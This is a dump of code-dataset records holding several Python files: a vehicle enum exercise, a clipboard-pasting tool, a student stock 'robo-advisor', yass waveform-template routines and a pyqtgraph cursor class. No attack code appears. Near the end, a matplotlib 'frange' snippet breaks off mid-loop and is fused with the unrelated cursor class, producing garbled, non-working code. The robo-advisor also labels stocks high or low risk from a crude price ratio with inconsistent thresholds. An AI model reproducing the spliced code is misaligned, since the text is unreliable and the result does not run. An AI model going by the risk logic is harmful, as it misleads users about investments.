\"1 hr\")\n TRACKED_VEHICLE = (\"338.14 km\", \"2.2 hr\")\n\n\n\n def __init__(self, distance, time):\n self.distance = distance\n self.time = time\n\n\n def get_speed(self):\n self.speed = float(self.distance.split(' ')[0]) / float(self.time.split(' ')[0])\n return self.speed\n\n\n def convert_speed(self):\n self.mph = self.speed * 0.621371\n return 
self.mph\n\n\n\nprint(Vehicle.ACT_ATTACK.value[0])\nprint(Vehicle.RC_BULLET.value[1])\nprint(Vehicle.AEROVELO_ETA.get_speed(), 'km')\nprint(Vehicle.AEROVELO_ETA.convert_speed(), \"mph\")","sub_path":"Modules/enum_module/dev_exercise/vehicles4.py","file_name":"vehicles4.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343604520","text":"# PBN TOOL BY SPAZZLO\n# TO BE USED WITH TASTOYS' PAINT BY NUMBERS\n# NOW WITH DONGLES\n\nimport sys\n\nif len(sys.argv) == 1:\n print(\"Gimmie a command file!\")\n sys.exit()\n\nimport pyperclip, time\n\nprint(\"Please select the chat box.\")\ntime.sleep(2)\n\ncommandsFile = open(sys.argv[1], \"r\")\ncommands = commandsFile.readlines()\ncommandsFile.close()\ncommandLength = len(commands)\nx = 0\n\nfor i in commands:\n x += 1\n pyperclip.copy(i)\n print(\"Copying [%s/%s] %s\" % (x, commandLength, i))\n time.sleep(3)\n","sub_path":"printImage.py","file_name":"printImage.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"605090709","text":"# my-secure-project/my_script.py\ndef main():\n\n import re\n import json\n from dotenv import load_dotenv\n import os\n import csv\n import requests\n\n import datetime\n import matplotlib\n import matplotlib.pyplot as plt\n import matplotlib.ticker as ticker\n\n from sendgrid import SendGridAPIClient\n from sendgrid.helpers.mail import Mail\n from sendgrid.helpers.mail import Mail, From, To, Subject, PlainTextContent, HtmlContent, SendGridException\n\n now = datetime.datetime.now()\n # print(os.getenv(\"ALPHAVANTAGE_API_KEY\")) # > None\n\n load_dotenv() # > loads contents of the .env file into the script's environment\n\n api_key = os.environ.get(\"ALPHAVANTAGE_API_KEY\")\n SENDGRID_API_KEY = os.getenv(\"SENDGRID_API_KEY\")\n MY_ADDRESS = os.environ.get(\"MY_EMAIL_ADDRESS\")\n\n # > \n client = SendGridAPIClient(SENDGRID_API_KEY)\n\n # print(api_key)\n\n # REFERENCED https://github.com/prof-rossetti/intro-to-python/blob/master/exercises/api-client/solution.py\n\n def getting_url(symbol_input):\n symbol_input = selected_stock\n request_url = f\"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol={symbol_input}&apikey={api_key}\"\n return request_url\n\n # followed Guided Screen Cast\n\n def process_ticker(symbol):\n request_url = getting_url(symbol) # requesting\n response = requests.get(request_url)\n # parse use the json module called jason.loads to change response.text to dictionary\n parsed_response = json.loads(response.text) # class to dict\n return parsed_response # define parsed response\n\n def transform_response(parsed_response):\n time_series = parsed_response[\"Time Series (Daily)\"]\n rows = [] # professor reosetti's robo example demo\n for date, daily_prices in time_series.items():\n row = {\n \"timestamp\": date,\n \"open\": float(daily_prices[\"1. open\"]),\n \"high\": float(daily_prices[\"2. high\"]),\n \"low\": float(daily_prices[\"3. low\"]),\n \"close\": float(daily_prices[\"4. close\"]),\n \"volume\": int(daily_prices[\"5. 
volume\"])\n }\n rows.append(row)\n return rows\n\n def write_to_csv(rows, csv_file_Path):\n csv_headers = [\"timestamp\", \"open\", \"high\", \"low\", \"close\", \"volume\"]\n with open(csv_file_path, \"w\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=csv_headers)\n writer.writeheader() # uses fieldnames set above\n for row in rows:\n writer.writerow(row)\n\n return True\n\n # csv_file_path = \"data/prices.csv\" # a relative filepath\n\n # timestamp, open, high, low, close, volume\n\n def usd_price(last_closing_price):\n return f\"${last_closing_price:,.2f}\" # usd conversion\n\n # USER INPUT\n\n if __name__ == \"__main__\": # revisited rock-paper and input module\n while True:\n selected_stock = input(\n \"Please enter the company symbol to access information: \")\n # fixed to acccept both lower and upper level alhabetical values, length of 4 or less.\n if len(selected_stock) > 4 or not re.match(\"^[A-Za-z]*$\", selected_stock):\n print(\"Invalid ticker, please Re-enter:\")\n else:\n if selected_stock == process_ticker(selected_stock):\n process_ticker(selected_stock)\n\n elif \"KeyError\" in process_ticker(selected_stock):\n print(\"Stock could not be found, please enter a valid ticker!\")\n # tried to replicate error checking from hiepnguneyen and megc on Github but is not working\n else:\n break\n\n # try:\n # data = process_ticker(selected_stock)\n # except KeyError:\n # print(\"Stock could not be found, please enter a valid ticker!\")\n # # KEYerror code still not working!\n # else:\n # break\n\n # followed Professor Rosetti's guided video\n parsed_response = process_ticker(selected_stock)\n last_refreshed = parsed_response[\"Meta Data\"][\"3. Last Refreshed\"]\n rows = transform_response(parsed_response) # define for write.csv\n row = transform_response(parsed_response) # define for plottin\n # matching the name from above def transform_response\n time_series = parsed_response[\"Time Series (Daily)\"]\n\n dates = list(time_series.keys())\n\n # taking the \"0\" from dates list \"2020-06-05 14:50:00\" //is latest date first?? MAKE SURE\n latest = dates[0]\n\n last_closing_price = time_series[latest][\"4. close\"]\n\n # breakpoint()\n\n recent_highs = [] # creating a list of highs to find the highest\n recent_lows = []\n\n for date in dates:\n recent_high = time_series[date][\"2. high\"]\n recent_highs.append(float(recent_high))\n recent_low = time_series[date][\"3. 
low\"]\n recent_lows.append(float(recent_low))\n\n recent_highest = max(recent_highs) # creating a list and\n recent_lowest = min(recent_lows)\n\n csv_file_path = os.path.join(os.path.dirname(\n __file__), \"..\", \"data\", \"prices.csv\") # ESTABLISHING CSV FILEPATH\n\n write_to_csv(rows, csv_file_path)\n\n formatted_csv_filepath = csv_file_path.split(\n \"..\")[1] # adopted from Prof Rosetti\n\n print(\"*****************************************************\")\n # referenced geeksforgeeks upper-lower input applications\n print(\"SELECTED SYMBOL:\" + selected_stock.upper())\n print(\"*****************************************************\")\n print(\"REQUESTING STOCK MARKET DATA...\")\n print(\"REQUEST TIME: \" + \" \" + now.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n print(\"*****************************************************\")\n print(f\"LATEST DAY: {last_refreshed}\")\n print(f\"LATEST CLOSE: {usd_price(float(last_closing_price))}\")\n print(f\"RECENT HIGH: {usd_price(float(recent_highest))}\")\n print(f\"RECENT LOW: {usd_price(float(recent_lowest))}\")\n\n print(\"*****************************************************\")\n print(\"YOU CAN ACCESS DATA VIA:\" + str(csv_file_path))\n print(\"*****************************************************\")\n print(\"*****************************************************\")\n print(\"*****************************************************\")\n\n while True:\n line_graph = input(\n \"IF A GRAPH WOULD BE HELPFUL PLEASE ENTER YES OR OTHERWISE PRESS ANY KEY TO CONTINUE FOR OTHER OPTIONS: \")\n if line_graph == \"YES\" or line_graph == \"yes\":\n print(\"*****************************************************\")\n print(\n \"AFTER VIEWING THE GRAPH, FOR MORE OPTIONS INCLUDING FREE ADVICE PLEASE EXIT WINDOW.\")\n print(\"*****************************************************\")\n closing_prices = []\n for cp in row:\n closing_prices.append(cp[\"close\"])\n graph_dates = sorted(dates)\n fig, ax = plt.subplots()\n\n # used https://matplotlib.org/3.1.1/gallery/ticks_and_spines/tick-locators.html for linearlocator\n ax.xaxis.set_major_locator(plt.LinearLocator(12))\n ax.yaxis.set_major_locator(plt.LinearLocator(6))\n\n # used https://matplotlib.org/3.1.1/gallery/pyplots/dollar_ticks.html for formatting to dollar sign\n formatter = ticker.FormatStrFormatter('$%1.2f')\n formatter2 = ticker.FuncFormatter(\n lambda x, p: format(int(x), ','))\n # used https://stackoverflow.com/questions/51734218/formatting-y-axis-matplotlib-with-thousands-separator-and-font-size\n ax.yaxis.set_major_formatter(formatter2)\n ax.yaxis.set_major_formatter(formatter)\n\n plt.plot(graph_dates, closing_prices)\n # used the Charts Excersize in class for line_graph\n\n plt.xlabel('Date', fontsize=12)\n plt.ylabel('Daily Close Price', fontsize=12)\n # referenced geeksforgeeks upper-lower input applications\n plt.title('Last Quarter Prices: ' +\n selected_stock.upper(), fontsize=18)\n plt.show()\n break\n else:\n break\n\n while True:\n advice_answer = input(\n \"WOULDYOU LIKE US TO EVALUATE THE RISK FOR YOU? PLEASE ENTER YES OR OTHERWISE PRESS ANY KEY TO CONTINUE FOR OTHER OPTIONS: \")\n if advice_answer == \"YES\" or advice_answer == \"yes\":\n if (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) >= 0.30:\n print(\"*****************************************************\")\n print(\n \"INVESTMENT ADVICE: THIS IS A HIGH RISK STOCK. PLEASE BE CAUTIOUS! 
\")\n print(\"*****************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"******************************************************\")\n break\n elif (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) >= 0.20:\n print(\"******************************************************\")\n print(\"INVESTMENT ADVICE: IN NORMAL CISRCUMSTANCES THIS WOULD BE CONSIDERED A HIGH RISK STOCK, CONSIDERING TODAY'S VOLATILE MARKETS, IT IS MEDIUM RISK, STILL BE CAUTIOUS! \")\n print(\"******************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"******************************************************\")\n break\n elif (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) < 0.11:\n print(\"******************************************************\")\n print(\"iNVESTMENT ADVICE: THIS IS MED-LOW RISK STOCK. \")\n print(\"******************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"*******************************************************\")\n\n elif (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) < 0.6:\n print(\"******************************************************\")\n print(\"INVESTMENT ADVICE: THIS IS LOW RISK STOCK \")\n print(\"******************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"*******************************************************\")\n\n else:\n exit()\n\n restart = input(\"if you would like to start over please enter YES?\")\n if restart == \"yes\" or restart == \"YES\":\n main()\n else:\n exit()\n\n\nmain()\n\n# to_emails = [To(\"em4063@ster.nyu.edu\")]\n# subject = \"E-Z Stock Acticity\"\n# # html_content = \"Hello, thank you for visiting us today. 
Below please find your search results for today:\"\n# message = Mail(from_email=MY_ADDRESS, to_emails=MY_ADDRESS,\n# subject=subject, html_content=html_content)\n\n# try:\n# response = client.send(message)\n\n# print(\"*****************************************************\")\n# # referenced geeksforgeeks upper-lower input applications\n# print(\"SELECTED SYMBOL:\" + selected_stock.upper())\n# print(\"*****************************************************\")\n# print(\"REQUESTING STOCK MARKET DATA...\")\n# print(\"REQUEST TIME: \" + \" \" + now.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n# print(\"*****************************************************\")\n# print(f\"LATEST DAY: {last_refreshed}\")\n# print(f\"LATEST CLOSE: {usd_price(float(last_closing_price))}\")\n# print(f\"RECENT HIGH: {usd_price(float(recent_highest))}\")\n# print(f\"RECENT LOW: {usd_price(float(recent_lowest))}\")\n\n# print(\"*****************************************************\")\n# print(\"YOU CAN ACCESS DATA VIA:\" + str(csv_file_path))\n# print(\"*****************************************************\")\n# print(\"*****************************************************\")\n# print(\"*****************************************************\")\n# except Exception as e:\n# print(\"OOPS\", e.message)\n","sub_path":"app/robo_advisor2.py","file_name":"robo_advisor2.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"333188575","text":"\"\"\"Class that provides some basic functions of wave forms.\"\"\"\n\nimport os\nimport numpy as np\nimport math\nimport logging\nimport parmap\n\nfrom scipy.interpolate import interp1d\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy import signal\n\nfrom yass import read_config\nfrom yass.reader import READER\nfrom yass.util import absolute_path_to_asset\n\nclass Geometry(object):\n \"\"\"Geometry Object for finidng closest channels.\"\"\"\n def __init__(self, geometry):\n self.geom = geometry\n self.pdist = squareform(pdist(geometry))\n\n def neighbors(self, channel, size):\n return np.argsort(self.pdist[channel, :])[:size]\n\n\nclass WaveForms(object):\n\n def __init__(self, wave_forms, geometry=None):\n \"\"\"Sets up and computes properties of wave forms.\n\n params:\n -------\n wave_forms: numpy.ndarray\n Shape of wave forms is (N, C, t). N is total number of wave forms\n C is number of channels and t is number of time points.\n geometry: numpy.ndarray\n Geometry of the probe that the wave forms belong to. 
Array has shape\n (N, 2) the coordinates of the probe.\n \"\"\"\n self.wave_forms = wave_forms\n self.n_unit, self.n_channel, self.n_time = self.wave_forms.shape\n self.unit_overlap = None\n self.pdist = None\n\n def pair_dist(self):\n \"\"\"Pairwise distance of templates to each other.\"\"\"\n if self.pdist is None: \n # Align all waveforms to the one with largest peak to peak.\n self.pdist = np.zeros([self.n_unit, self.n_unit]) + np.inf\n max_ptp_unit = self.ptp().argmax()\n vis_chan = self.vis_chan()\n al_wf = self.align(\n ref_wave_form=self.wave_forms[max_ptp_unit])\n for unit in range(self.n_unit):\n # Iterate over all units to find the best match.\n over_units = self.overlap()[unit]\n diff = al_wf[[unit]] - al_wf[over_units]\n diff = np.sqrt(np.square(diff).sum(axis=-1).sum(axis=-1))\n self.pdist[unit, over_units] = diff \n\n return self.pdist\n\n def __getitem__(self, key):\n return self.wave_forms.__getitem__(key)\n\n def svd_reconstruct(self, temp_id, rank=3):\n \"\"\"Reconstruct the wave forms by given id using SVD.\n\n params:\n -------\n temp_id: int or np.array\n template id(s) of the template to be reconstructed.\n rank: int\n Rank of the SVD reconstruction.\n\n returns:\n --------\n numpy.ndarray of shape (C, t) or (n, C, t) which is the SVD\n reconstructed version of the given wave forms.\n \"\"\"\n u, h, v = np.linalg.svd(self.wave_forms[temp_id, :, :])\n if len(u.shape) == 3:\n # Multiple units at a time.\n return np.matmul(u[:, :, :rank] * h[:, None, :rank], v[:, :rank, :])\n\n return np.matmul(u[:, :rank] * h[:rank], v[:rank, :])\n\n def vis_chan(self, threshold=2.):\n \"\"\"Computes boolean visibility matrix of the wave forms.\n\n params:\n -------\n threshold: float\n Threshold of visibility in terms of standard unit (SU).\n\n return:\n -------\n numpy.ndarray of shape (N, C).\n \"\"\"\n return self.wave_forms.ptp(axis=-1) > threshold\n\n def overlap(self, threshold=2.):\n \"\"\"Computes boolean spatial overlap of templates.\n\n params:\n -------\n threshold: float\n Threshold of visibility in terms of standard unit (SU).\n\n return:\n -------\n numpy.ndarray of shape (N, N).\n \"\"\"\n if self.unit_overlap is None:\n vis = self.vis_chan()\n self.unit_overlap = np.sum(\n np.logical_and(vis[:, None, :], vis[None, :, :]), axis=2)\n self.unit_overlap = self.unit_overlap > 0\n return self.unit_overlap\n \n def ptp(self):\n \"\"\"Returns ptp of wave forms in standard units.\n\n returns:\n --------\n numpy.array of size N.\n \"\"\"\n return self.wave_forms.ptp(axis=-1).max(axis=-1)\n\n def get_shifted_waveforms(self, shifts, clip_value):\n \"\"\"Get shifted viersions of the wave forms given the amount of shifts.\n\n params:\n -------\n shifts: float or np.array.float\n List of shifts that indicated how much has to change.\n\n returns:\n --------\n numpy.ndarray of shifted wave forms.\n \"\"\"\n unit_time_window = np.arange(\n self.n_time - 2 * clip_value) + shifts[:, None]\n default_range = np.arange(self.n_time - 2 * clip_value)\n sub_shifts = shifts - np.floor(shifts)\n shifts = np.floor(shifts).astype(np.int)\n\n def sub(i, shift, sub=None):\n if sub is None:\n return self.wave_forms[i, :, default_range + shift]\n return sub(i, shift) * sub + sub(i, shift + 1) * (1 - sub)\n\n if sub_shifts.sum() > 0.:\n # Linear interpolation.\n np.array(\n [sub(i, s, sub_shifts[i]) for i, s in enumerate(\n shifts)]).transpose([0, 2, 1])\n\n return np.array(\n [sub(i, s) for i, s in enumerate(shifts)]).transpose([0, 2, 1])\n\n def align(self, ref_wave_form=None, jitter=3, upsample=1):\n 
\"\"\"Aligns all the wave forms to the reference wave form.\n\n params:\n -------\n jitter: int\n How much jitter per wave form in subsample time is allowed.\n upsample: int\n Factor for interpolation of signals.\n \"\"\"\n if ref_wave_form is None:\n ref_wave_form = self.wave_forms.mean(axis=0)\n\n ptp = ref_wave_form.ptp(axis=1)\n max_chan = ptp.argmax()\n\n wf = self.wave_forms\n if upsample > 1:\n x_range = np.arange(0, self.n_time)\n f = interp1d(x_range, self.wave_forms)\n wf = f(x_range[:-1] + np.arange(0, 1, 1./upsample))\n\n # Upsample these guys\n ref = ref_wave_form[max_chan, jitter:-jitter]\n idx = np.arange(\n self.n_time - 2 * jitter) + np.arange(2 * jitter)[:, None]\n all_shifts = self.wave_forms[:, max_chan, idx]\n best_shift_idx = np.square(\n all_shifts - ref).sum(axis=-1).argmin(axis=-1)\n return self.get_shifted_waveforms(best_shift_idx, clip_value=jitter)\n\n\ndef update_templates(\n fname_templates,\n fname_spike_train,\n recordings_filename,\n recording_dtype,\n output_directory,\n rate=0.002,\n unit_ids=None):\n\n logger = logging.getLogger(__name__)\n\n CONFIG = read_config()\n\n # output folder\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n fname_templates_updated = os.path.join(\n output_directory, 'templates_updated.npy')\n if os.path.exists(fname_templates_updated):\n return fname_templates_updated, None\n\n reader = READER(recordings_filename,\n recording_dtype,\n CONFIG)\n\n # max channel for each unit\n max_channels = np.load(fname_templates).ptp(1).argmax(1)\n fname_templates_new = run_template_computation(\n fname_spike_train,\n reader,\n output_directory,\n max_channels=max_channels,\n unit_ids=unit_ids,\n multi_processing=CONFIG.resources.multi_processing,\n n_processors=CONFIG.resources.n_processors)\n\n # load templates\n templates_orig = np.load(fname_templates)\n templates_new = np.load(fname_templates_new)\n\n n_units, n_times, n_channels = templates_orig.shape\n n_units_new = templates_new.shape[0]\n \n if unit_ids is None:\n unit_ids = np.arange(n_units)\n\n # if last few units have no spikes deconvovled, the length of new templates\n # can be shorter. 
then, zero pad it\n if n_units_new < n_units:\n zero_pad = np.zeros((n_units-n_units_new, n_times, n_channels), 'float32')\n templates_new = np.concatenate(\n (templates_new, zero_pad), axis=0)\n\n # number of deconvolved spikes\n n_spikes = np.zeros(n_units)\n units_unique, n_spikes_unique = np.unique(\n np.load(fname_spike_train)[:, 1], return_counts=True)\n n_spikes[units_unique] = n_spikes_unique\n\n # update rule if it will be updated\n weight_to_update = np.power((1 - rate), n_spikes)\n\n # only update for units in unit_ids \n weight = np.ones(n_units)\n weight[unit_ids] = weight_to_update[unit_ids]\n weight = weight[:, None, None]\n\n # align templates\n templates_orig, templates_new = align_two_set_of_templates(\n templates_orig, templates_new)\n\n # update and save\n templates_updated = weight*templates_orig + (1-weight)*templates_new\n np.save(fname_templates_updated, templates_updated)\n\n # check the difference\n max_diff = np.zeros(n_units)\n max_diff[unit_ids] = np.max(\n np.abs(templates_new[unit_ids] - templates_orig[unit_ids]),\n axis=(1,2))\n max_diff = max_diff/templates_orig.ptp(1).max(1)\n\n return fname_templates_updated, max_diff\n\n\ndef align_two_set_of_templates(templates1, templates2, ref_set=0):\n \n n_units = templates1.shape[0]\n \n for unit in range(n_units):\n temp = np.concatenate((templates1[[unit]],\n templates2[[unit]]),\n axis=0)\n aligned_temp, _ = align_templates(temp, ref_unit=ref_set)\n templates1[unit] = aligned_temp[0]\n templates2[unit] = aligned_temp[1]\n \n return templates1, templates2\n \n\ndef align_templates(templates, ref_unit=None):\n\n if ref_unit is None:\n max_idx = templates.ptp(1).max(1).argmax(0)\n ref_template = templates[max_idx]\n else:\n ref_template = templates[ref_unit]\n max_chan = ref_template.ptp(0).argmax(0)\n ref_template = ref_template[:, max_chan]\n \n\n temps = templates[:, :, max_chan]\n\n best_shifts = align_get_shifts_with_ref(\n temps, ref_template)\n\n aligned_templates = shift_chans(templates, best_shifts)\n \n return aligned_templates, best_shifts\n\n\ndef run_template_computation(\n fname_spike_train,\n reader,\n out_dir,\n max_channels=None,\n unit_ids=None,\n multi_processing=False,\n n_processors=1):\n\n logger = logging.getLogger(__name__)\n \n logger.info(\"computing templates\")\n\n # make output folder\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n fname_templates = os.path.join(out_dir, 'templates.npy')\n if os.path.exists(fname_templates):\n return fname_templates\n\n # make temp folder\n tmp_folder = os.path.join(out_dir, 'tmp_template')\n if not os.path.exists(tmp_folder):\n os.makedirs(tmp_folder)\n\n # partition spike train per unit for multiprocessing\n #fname_spike_times, n_units = partition_spike_time(\n # tmp_folder, fname_spike_train)\n\n n_units = np.max(np.load(fname_spike_train)[:, 1]) + 1\n\n if unit_ids is None:\n unit_ids = np.arange(n_units)\n\n # gather input arguments\n fnames_out = []\n for unit in unit_ids:\n fnames_out.append(os.path.join(\n tmp_folder,\n \"template_unit_{}.npy\".format(unit)))\n\n # max channels in\n if max_channels is not None:\n max_channels = list(max_channels[unit_ids])\n else:\n max_channels = [None for j in range(len(unit_ids))]\n \n # run computing function\n if multi_processing:\n parmap.starmap(run_template_computation_parallel,\n list(zip(unit_ids, max_channels, fnames_out)),\n fname_spike_train,\n reader,\n processes=n_processors,\n pm_pbar=True)\n else:\n for ctr in unit_ids:\n run_template_computation_parallel(\n fname_spike_train,\n 
max_channels[ctr],\n fnames_out[ctr],\n reader)\n\n # gather all info\n templates_new = np.zeros((n_units, reader.spike_size, reader.n_channels),\n 'float32')\n for ctr, unit in enumerate(unit_ids):\n if os.path.exists(fnames_out[ctr]):\n templates_new[unit] = np.load(fnames_out[ctr])\n\n np.save(fname_templates, templates_new)\n\n return fname_templates\n\n\ndef run_template_computation_parallel(\n unit_id, max_channel, fname_out, fname_spike_train, reader):\n\n if os.path.exists(fname_out):\n return\n\n # load spike times\n spike_train = np.load(fname_spike_train)\n spike_times = spike_train[spike_train[:, 1] == unit_id, 0]\n\n if len(spike_times) > 0:\n template = compute_a_template(spike_times,\n max_channel,\n reader)\n else:\n template = np.zeros(\n (reader.spike_size, reader.n_channels), 'float32')\n\n # save result\n np.save(fname_out, template)\n\n\ndef compute_a_template(spike_times, max_channel, reader):\n\n # subsample upto 1000\n max_spikes = 1000\n if len(spike_times) > max_spikes:\n spike_times = np.random.choice(a=spike_times,\n size=max_spikes,\n replace=False)\n\n # get waveforms\n wf, _ = reader.read_waveforms(spike_times)\n\n # max channel\n if max_channel is None:\n max_channel = np.mean(wf, axis=0).ptp(0).argmax()\n\n wf, _ = align_waveforms(wf=wf,\n max_channel=max_channel,\n upsample_factor=3,\n nshifts=3)\n\n return np.median(wf, axis=0).astype('float32')\n\ndef partition_spike_time(save_dir,\n fname_spike_index):\n\n # make directory\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\n # load data\n spike_index = np.load(fname_spike_index)\n # re-organize spike times and templates id\n n_units = np.max(spike_index[:, 1]) + 1\n spike_index_list = [[] for ii in range(n_units)]\n for j in range(len(spike_index)):\n tt, ii = spike_index[j]\n spike_index_list[ii].append(tt)\n\n # save them\n fname = os.path.join(save_dir, 'spike_times.npy')\n np.save(fname, spike_index_list)\n\n return fname, n_units\n\ndef align_waveforms(wf, max_channel=None, upsample_factor=5, nshifts=7):\n\n # get shapes\n n_spikes, n_times, n_channels = wf.shape\n\n # mean shape and max channel\n mean_wf = np.mean(wf, axis=0)\n if max_channel is None:\n max_channel = mean_wf.ptp(0).argmax()\n\n shifts = align_get_shifts_with_ref(\n wf[:, :, max_channel], None, upsample_factor, nshifts)\n \n wf_aligned = shift_chans(wf, shifts)\n \n return wf_aligned, shifts\n \ndef align_get_shifts_with_ref(wf, ref=None, upsample_factor=5, nshifts=7):\n\n ''' Align all waveforms on a single channel\n \n wf = selected waveform matrix (# spikes, # samples)\n max_channel: is the last channel provided in wf \n \n Returns: superresolution shifts required to align all waveforms\n - used downstream for linear interpolation alignment\n '''\n # Cat: TODO: Peter's fix to clip/lengthen loaded waveforms to match reference templates \n n_data, n_time = wf.shape\n\n if ref is None:\n ref = np.mean(wf, axis=0)\n\n #n_time_rf = len(ref)\n #if n_time > n_time_rf:\n # left_cut = (n_time - n_time_rf)//2\n # right_cut = n_time - n_time_rf - left_cut\n # wf = wf[:, left_cut:-right_cut]\n #elif n_time < n_time_rf:\n # left_buffer = np.zeros((n_data, (n_time_rf - n_time)//2))\n # right_buffer = np.zeros((n_data,n_time_rf - n_time - left_buffer))\n # wf = np.concatenate((left_buffer, wf, right_buffer), axis=1)\n \n # convert nshifts from timesamples to #of times in upsample_factor\n nshifts = (nshifts*upsample_factor)\n if nshifts%2==0:\n nshifts+=1\n\n # or loop over every channel and parallelize each channel:\n #wf_up = []\n 
wf_up = upsample_resample(wf, upsample_factor)\n wlen = wf_up.shape[1]\n wf_start = nshifts//2\n wf_end = -nshifts//2\n \n wf_trunc = wf_up[:,wf_start:wf_end]\n wlen_trunc = wf_trunc.shape[1]\n \n # align to last chanenl which is largest amplitude channel appended\n ref_upsampled = upsample_resample(ref[np.newaxis], upsample_factor)[0]\n ref_shifted = np.zeros([wf_trunc.shape[1], nshifts])\n \n for i,s in enumerate(range(-(nshifts//2), (nshifts//2)+1)):\n ref_shifted[:,i] = ref_upsampled[s + wf_start: s + wf_end]\n\n bs_indices = np.matmul(wf_trunc[:,np.newaxis], ref_shifted).squeeze(1).argmax(1)\n best_shifts = (np.arange(-int((nshifts-1)/2), int((nshifts-1)/2+1)))[bs_indices]\n\n return best_shifts/np.float32(upsample_factor)\n\ndef upsample_resample(wf, upsample_factor):\n wf = wf.T\n waveform_len, n_spikes = wf.shape\n traces = np.zeros((n_spikes, (waveform_len-1)*upsample_factor+1),'float32')\n for j in range(wf.shape[1]):\n traces[j] = signal.resample(wf[:,j],(waveform_len-1)*upsample_factor+1)\n return traces\n\ndef shift_chans(wf, best_shifts):\n # use template feat_channel shifts to interpolate shift of all spikes on all other chans\n # Cat: TODO read this from CNOFIG\n wfs_final= np.zeros(wf.shape, 'float32')\n for k, shift_ in enumerate(best_shifts):\n if int(shift_)==shift_:\n ceil = int(shift_)\n temp = np.roll(wf[k],ceil,axis=0)\n else:\n ceil = int(math.ceil(shift_))\n floor = int(math.floor(shift_))\n temp = np.roll(wf[k],ceil,axis=0)*(shift_-floor)+np.roll(wf[k],floor, axis=0)*(ceil-shift_)\n wfs_final[k] = temp\n \n return wfs_final\n","sub_path":"src/yass/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":17729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"205698817","text":"import matplotlib.pyplot as plt\r\n# plt.style.use('ggplot') # 使用‘ggplot风格美化图表’\r\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 步骤一(替换sans-serif字体)\r\nplt.rcParams['axes.unicode_minus'] = False # 步骤二(解决坐标轴负数的负号显示问题)\r\n\r\ndef frange(start,final,increment):\r\n numbers=[]\r\n while start len(self.parent.curves):\r\n raise ValueError('The curve you selected does not exist')\r\n self.refPlot = self.parent.curves[curveIndex] if curve is None else curve\r\n xStart = self.refPlot.xData[0]\r\n yStart = self.refPlot.yData[0]\r\n self.xRef = None\r\n self.yRef = None\r\n self.singleLine = '' \r\n if not xLine and not yLine:\r\n raise ValueError('You cannot create a cursor without a reference Line')\r\n if xLine:\r\n self.xRef = InfiniteLine(pos = xStart,angle = 90,movable = True, pen = cPen, bounds = [min(self.refPlot.xData),max(self.refPlot.xData)])\r\n self.parent.addItem(self.xRef)\r\n self.xRef.sigPositionChanged.connect(self.updateCursor)\r\n if not yLine:\r\n self.singleLine = 'self.refPlot.xData'\r\n if yLine:\r\n self.yRef = InfiniteLine(pos = yStart,angle = 0,movable = not xLine, pen = cPen, bounds = [min(self.refPlot.yData),max(self.refPlot.yData)])\r\n self.parent.addItem(self.yRef)\r\n if not xLine:\r\n self.yRef.sigPositionChanged.connect(self.updateCursor)\r\n self.singleLine = 'self.refPlot.yData'\r\n \r\n self.point = self.parent.plot([self.refPlot.xData[0]],[self.refPlot.yData[0]],pen = None, symbol = symb, symbolPen = cPen, symbolBrush = cPen)\r\n self.color = cPen\r\n self.symbol = symb\r\n if xLine and yLine:\r\n self.whoMovesWho = {self.xRef: [self.yRef,'self.refPlot.xData',0], self.yRef: [self.xRef,'self.refPlot.yData',1]}\r\n \r\n \r\n def updateCursor(self,evt):\r\n culprit = evt.sender()\r\n 
changedPos = culprit.pos()\r\n utilStr = 'where(array('\r\n newPoint = [0,0]\r\n if self.xRef is not None and self.yRef is not None:\r\n utilStr2 = ')>=changedPos[self.whoMovesWho[culprit][2]])[0][0]'\r\n toMove = self.whoMovesWho[culprit][0]\r\n baseStr = self.whoMovesWho[culprit][1]\r\n approxInd = eval(utilStr+baseStr+utilStr2)\r\n newValCulp = eval(baseStr+'['+str(approxInd)+']')\r\n newValMove = eval(self.whoMovesWho[toMove][1]+'['+str(approxInd)+']')\r\n newPoint[self.whoMovesWho[culprit][2]] = newValCulp\r\n newPoint[self.whoMovesWho[toMove][2]] = newValMove\r\n toMove.setPos(newPoint)\r\n culprit.sigPositionChanged.disconnect()\r\n culprit.setPos(newPoint)\r\n culprit.sigPositionChanged.connect(self.updateCursor)\r\n else:\r\n baseStr = self.singleLine\r\n utilStr2 = ')>=changedPos['+str(int(self.xRef is None))+'])[0][0]'\r\n approxInd = eval(utilStr+baseStr+utilStr2)\r\n newPoint[0] = self.refPlot.xData[approxInd]\r\n newPoint[1] = self.refPlot.yData[approxInd]\r\n \r\n self.point.setData([newPoint[0]],[newPoint[1]])\r\n self.moved.emit(newPoint)\r\n \r\n \r\n def pos(self):\r\n 